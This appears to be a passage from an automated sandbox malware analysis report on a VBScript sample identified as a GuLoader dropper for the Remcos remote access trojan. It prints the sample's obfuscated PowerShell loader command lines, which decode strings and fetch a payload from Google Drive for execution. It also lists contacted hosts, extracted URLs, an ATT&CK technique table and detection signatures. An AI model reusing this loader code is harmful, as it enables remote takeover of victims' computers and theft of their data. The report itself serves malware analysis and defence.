ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le OeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $taltegns;function janey($naturprodukt){ .($glassliberes) ($naturprodukt)} function infractor($naturalization){$reacquainted129=4;do{$cozies104+=$naturalization[$reacquainted129];$reacquainted129+=5;$bemoil=format-list} until(!$naturalization[$reacquainted129])$cozies104}$vagttaarnenes=infractor 'w xbnparaecenttr ck. blow';$vagttaarnenes+=infractor 'ba nepjevbawakc,areltobaiblepesqu nsprot';$dysbulic=infractor 'tekrmgrooomindzafprisirild bil digada b/';$altnglerne92=infractor 'imp tethylfremsgrap1spot2';$segregerede=' rig[maksnne,oebechtb.ro.p.gws k pekam.risagvaandiforpc speevaskpspgeorelai phonkompthumom.eroa m rnsanga alcg rele bilralop]smre:kiss: ejsscbfte sivc su uopharkar i ongtpen yagnopharlr.arionecet f.ro.jencmjesocolllrime=d.mp$wencaescalphostovernbanegtolvlscraesaldru,pfnsgete asy9flyw2';$dysbulic+=infractor ' fre5s,rg. car0opse resi(sygew s.ci flynpseudspekom.ljwk lvsul.i modun icet unv barn1homo0trib.biod0be i;be t cod,wcar ih llnbefo6mist4nonn;krad fripxf rs6apra4stan;rec. marrarvevclas:rhod1ufo 3 fol4 opf.unif0l vs)ud a sickg ercemasoctrogk,onrogen,/gono2,igo0k,pi1mass0u.in0 dal1fiel0 ata1 ent b,defov,ripar rine.eove f oico mi xsuda/ we 1knig3macu4 sco.ko t0';$quillaias180=infractor 'locauslagsbakke exirtogd-in dahjlpgun,ee he nununt';$aabningstidernes=infractor ' upmhkeglt .rntle,sptri s til: hor/san /octadknsfrmik.i sliv ante u.u. ,legeft oquafopolyg prol nae aut.s,idccorrojug moffe/ re u katcspl ? ,loeme axri,dpund,osp,rrsaldtlion=un vderhvoconcw abnepiclskovomissakunsd fro&unsaiantidopsu=aspa1dep,yiron_fr gmpennuendo1.matisammxmelotumrkx ,uiqudhuamoradu.ign,wee_kundffi a6sala5 vicc hornlouv0 t gb ferfsti 8bedllchlof,isc0.tlnxbuscc i o8aldeucong0u dei';$rotationspumperne=infractor ' ugi>';$glassliberes=infractor 'dormitiliev wex';$eliquating='gulvs';$klatrende='\udskilleres.bre';janey (infractor ',itr$outcgunscl kelo ,ncbnonearesulaad,:,rspic azn f,ltspeer .blaoceavrem e ascnschcs ill= et$elkaewar ne.chvrdbe:noncalas.p undpdiamdnegra fortinadasylv+skry$ yrbkarselsalmaf rgtunpir airesc.rnskrad ese');janey (infractor ' erk$physgbenzlhemaoarkoblokaar adlskul:ludwms riigratccharm octastatcsmre=r fu$ingeaanesa esblillnsandiplynn mregagens a at utticappdfu,de,forrholln unfeu,shs nay.kerystriepher logleildent ag(ev,j$popur telo best galaso ntauxiiregroperfn munstillpsam ualvemserpp ac,ewarprlandn pg ed,fr)');janey (infractor $segregerede);$aabningstidernes=$micmac[0];$bayer=(infractor 'cler$ ensgsyg.ltrocoundebbaneavavalpluk: indealinmchilua delnonpgsti.enonfrredbi outncafegpho eu tart lenbarrecoensogr,= ,lbncompe,ehawgr n-uncaointeb qabjsceneoutfcdoubtren. tabesreb.ypolessup,topbeedy fmexpo.iv.k$ rapvpleba igegpa it ,ipt .leaergoaclu r ricnhfl efo bn melepa,ls');janey ($bayer);janey (infractor 'l.fg$frafe obembi.su.onsl ,cagka.eemenurspe,imochnun,eg.rikefor rkruknseyceundusombr.mo ah rame,nuaadupldpa le oe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $taltegns;function janey($naturprodukt){ .($glassliberes) ($naturprodukt)} function infractor($naturalization){$reacquainted129=4;do{$cozies104+=$naturalization[$reacquainted129];$reacquainted129+=5;$bemoil=format-list} until(!$naturalization[$reacquainted129])$cozies104}$vagttaarnenes=infractor 'w xbnparaecenttr ck. blow';$vagttaarnenes+=infractor 'ba nepjevbawakc,areltobaiblepesqu nsprot';$dysbulic=infractor 'tekrmgrooomindzafprisirild bil digada b/';$altnglerne92=infractor 'imp tethylfremsgrap1spot2';$segregerede=' rig[maksnne,oebechtb.ro.p.gws k pekam.risagvaandiforpc speevaskpspgeorelai phonkompthumom.eroa m rnsanga alcg rele bilralop]smre:kiss: ejsscbfte sivc su uopharkar i ongtpen yagnopharlr.arionecet f.ro.jencmjesocolllrime=d.mp$wencaescalphostovernbanegtolvlscraesaldru,pfnsgete asy9flyw2';$dysbulic+=infractor ' fre5s,rg. car0opse resi(sygew s.ci flynpseudspekom.ljwk lvsul.i modun icet unv barn1homo0trib.biod0be i;be t cod,wcar ih llnbefo6mist4nonn;krad fripxf rs6apra4stan;rec. marrarvevclas:rhod1ufo 3 fol4 opf.unif0l vs)ud a sickg ercemasoctrogk,onrogen,/gono2,igo0k,pi1mass0u.in0 dal1fiel0 ata1 ent b,defov,ripar rine.eove f oico mi xsuda/ we 1knig3macu4 sco.ko t0';$quillaias180=infractor 'locauslagsbakke exirtogd-in dahjlpgun,ee he nununt';$aabningstidernes=infractor ' upmhkeglt .rntle,sptri s til: hor/san /octadknsfrmik.i sliv ante u.u. ,legeft oquafopolyg prol nae aut.s,idccorrojug moffe/ re u katcspl ? ,loeme axri,dpund,osp,rrsaldtlion=un vderhvoconcw abnepiclskovomissakunsd fro&unsaiantidopsu=aspa1dep,yiron_fr gmpennuendo1.matisammxmelotumrkx ,uiqudhuamoradu.ign,wee_kundffi a6sala5 vicc hornlouv0 t gb ferfsti 8bedllchlof,isc0.tlnxbuscc i o8aldeucong0u dei';$rotationspumperne=infractor ' ugi>';$glassliberes=infractor 'dormitiliev wex';$eliquating='gulvs';$klatrende='\udskilleres.bre';janey (infractor ',itr$outcgunscl kelo ,ncbnonearesulaad,:,rspic azn f,ltspeer .blaoceavrem e ascnschcs ill= et$elkaewar ne.chvrdbe:noncalas.p undpdiamdnegra fortinadasylv+skry$ yrbkarselsalmaf rgtunpir airesc.rnskrad ese');janey (infractor ' erk$physgbenzlhemaoarkoblokaar adlskul:ludwms riigratccharm octastatcsmre=r fu$ingeaanesa esblillnsandiplynn mregagens a at utticappdfu,de,forrholln unfeu,shs nay.kerystriepher logleildent ag(ev,j$popur telo best galaso ntauxiiregroperfn munstillpsam ualvemserpp ac,ewarprlandn pg ed,fr)');janey (infractor $segregerede);$aabningstidernes=$micmac[0];$bayer=(infractor 'cler$ ensgsyg.ltrocoundebbaneavavalpluk: indealinmchilua delnonpgsti.enonfrredbi outncafegpho eu tart lenbarrecoensogr,= ,lbncompe,ehawgr n-uncaointeb qabjsceneoutfcdoubtren. tabesreb.ypolessup,topbeedy fmexpo.iv.k$ rapvpleba igegpa it ,ipt .leaergoaclu r ricnhfl efo bn melepa,ls');janey ($bayer);janey (infractor 'l.fg$frafe obembi.su.onsl ,cagka.eemenurspe,imochnun,eg.rikefor rkruknseyceundusombr.mo ah rame,nuaadupldpa le oe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $taltegns;function janey($naturprodukt){ .($glassliberes) ($naturprodukt)} function infractor($naturalization){$reacquainted129=4;do{$cozies104+=$naturalization[$reacquainted129];$reacquainted129+=5;$bemoil=format-list} until(!$naturalization[$reacquainted129])$cozies104}$vagttaarnenes=infractor 'w xbnparaecenttr ck. blow';$vagttaarnenes+=infractor 'ba nepjevbawakc,areltobaiblepesqu nsprot';$dysbulic=infractor 'tekrmgrooomindzafprisirild bil digada b/';$altnglerne92=infractor 'imp tethylfremsgrap1spot2';$segregerede=' rig[maksnne,oebechtb.ro.p.gws k pekam.risagvaandiforpc speevaskpspgeorelai phonkompthumom.eroa m rnsanga alcg rele bilralop]smre:kiss: ejsscbfte sivc su uopharkar i ongtpen yagnopharlr.arionecet f.ro.jencmjesocolllrime=d.mp$wencaescalphostovernbanegtolvlscraesaldru,pfnsgete asy9flyw2';$dysbulic+=infractor ' fre5s,rg. car0opse resi(sygew s.ci flynpseudspekom.ljwk lvsul.i modun icet unv barn1homo0trib.biod0be i;be t cod,wcar ih llnbefo6mist4nonn;krad fripxf rs6apra4stan;rec. marrarvevclas:rhod1ufo 3 fol4 opf.unif0l vs)ud a sickg ercemasoctrogk,onrogen,/gono2,igo0k,pi1mass0u.in0 dal1fiel0 ata1 ent b,defov,ripar rine.eove f oico mi xsuda/ we 1knig3macu4 sco.ko t0';$quillaias180=infractor 'locauslagsbakke exirtogd-in dahjlpgun,ee he nununt';$aabningstidernes=infractor ' upmhkeglt .rntle,sptri s til: hor/san /octadknsfrmik.i sliv ante u.u. ,legeft oquafopolyg prol nae aut.s,idccorrojug moffe/ re u katcspl ? ,loeme axri,dpund,osp,rrsaldtlion=un vderhvoconcw abnepiclskovomissakunsd fro&unsaiantidopsu=aspa1dep,yiron_fr gmpennuendo1.matisammxmelotumrkx ,uiqudhuamoradu.ign,wee_kundffi a6sala5 vicc hornlouv0 t gb ferfsti 8bedllchlof,isc0.tlnxbuscc i o8aldeucong0u dei';$rotationspumperne=infractor ' ugi>';$glassliberes=infractor 'dormitiliev wex';$eliquating='gulvs';$klatrende='\udskilleres.bre';janey (infractor ',itr$outcgunscl kelo ,ncbnonearesulaad,:,rspic azn f,ltspeer .blaoceavrem e ascnschcs ill= et$elkaewar ne.chvrdbe:noncalas.p undpdiamdnegra fortinadasylv+skry$ yrbkarselsalmaf rgtunpir airesc.rnskrad ese');janey (infractor ' erk$physgbenzlhemaoarkoblokaar adlskul:ludwms riigratccharm octastatcsmre=r fu$ingeaanesa esblillnsandiplynn mregagens a at utticappdfu,de,forrholln unfeu,shs nay.kerystriepher logleildent ag(ev,j$popur telo best galaso ntauxiiregroperfn munstillpsam ualvemserpp ac,ewarprlandn pg ed,fr)');janey (infractor $segregerede);$aabningstidernes=$micmac[0];$bayer=(infractor 'cler$ ensgsyg.ltrocoundebbaneavavalpluk: indealinmchilua delnonpgsti.enonfrredbi outncafegpho eu tart lenbarrecoensogr,= ,lbncompe,ehawgr n-uncaointeb qabjsceneoutfcdoubtren. tabesreb.ypolessup,topbeedy fmexpo.iv.k$ rapvpleba igegpa it ,ipt .leaergoaclu r ricnhfl efo bn melepa,ls');janey ($bayer);janey (infractor 'l.fg$frafe obembi.su.onsl ,cagka.eemenurspe,imochnun,eg.rikefor rkruknseyceundusombr.mo ah rame,nuaadupldpa le oeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B04NATJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633356 Sample: CO894GOV2O25.vbs Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 29 drive.usercontent.google.com 2->29 31 drive.google.com 2->31 33 Host_6637.6637.6637.657e 2->33 43 Malicious sample detected (through community Yara rule) 2->43 45 Yara detected GuLoader 2->45 47 Yara detected Powershell download and execute 2->47 49 5 other signatures 2->49 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 51 VBScript performs obfuscated calls to suspicious functions 8->51 53 Suspicious powershell command line found 8->53 55 Wscript starts Powershell (via cmd or directly) 8->55 65 2 other signatures 8->65 15 powershell.exe 14 20 8->15         started        19 PING.EXE 1 8->19         started        57 Early bird code injection technique detected 11->57 59 Writes to foreign memory regions 11->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 11->61 63 Queues an APC in another process (thread injection) 11->63 21 msiexec.exe 6 11->21         started        23 conhost.exe 11->23         started        process6 dnsIp7 35 drive.usercontent.google.com 142.250.185.97, 443, 49690, 49698 GOOGLEUS United States 15->35 37 drive.google.com 216.58.212.174, 443, 49688, 49689 GOOGLEUS United States 15->37 39 Found suspicious powershell code related to unpacking or dynamic code loading 15->39 25 conhost.exe 15->25         started        27 conhost.exe 19->27         started        41 Detected Remcos RAT 21->41 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              CO894GOV2O25.vbs11%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://go.microsoft.c0%Avira URL Cloudsafe
              http://go.microsoft.ce0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.210.172
              		truefalse
                		high
                drive.google.com
                		216.58.212.174
                		truefalse
                  		high
                  drive.usercontent.google.com
                  		142.250.185.97
                  		truefalse
                    		high
                    Host_6637.6637.6637.657e
                    		unknown
                    		unknownfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://drive.googpowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/uc?expowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/upowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.google.powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.gopowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.goopowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.compowershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.gpowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/ucpowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.1926844713.00000000043D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.google.com/powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.googlpowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.google.com/uc?epowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.compowershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.usercontent.google.compowershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://go.microsoft.cpowershell.exe, 0000000C.00000002.1923721123.0000000002881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://drive.google.cpowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore68powershell.exe, 00000009.00000002.1512336299.0000013ACEBA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://apis.google.compowershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://go.microsoft.cepowershell.exe, 0000000C.00000002.1923721123.0000000002881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://drive.google.com/uc?powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1512336299.0000013ACEBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1926844713.00000000043D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://drive.googlepowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://drive.google.copowershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  216.58.212.174
                                                                                  		drive.google.comUnited States
                                                                                  		15169GOOGLEUSfalse
                                                                                  142.250.185.97
                                                                                  		drive.usercontent.google.comUnited States
                                                                                  		15169GOOGLEUSfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1633356
                                                                                  Start date and time:2025-03-10 09:17:56 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 39s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:21
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:1
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:CO894GOV2O25.vbs
                                                                                  Detection:MAL
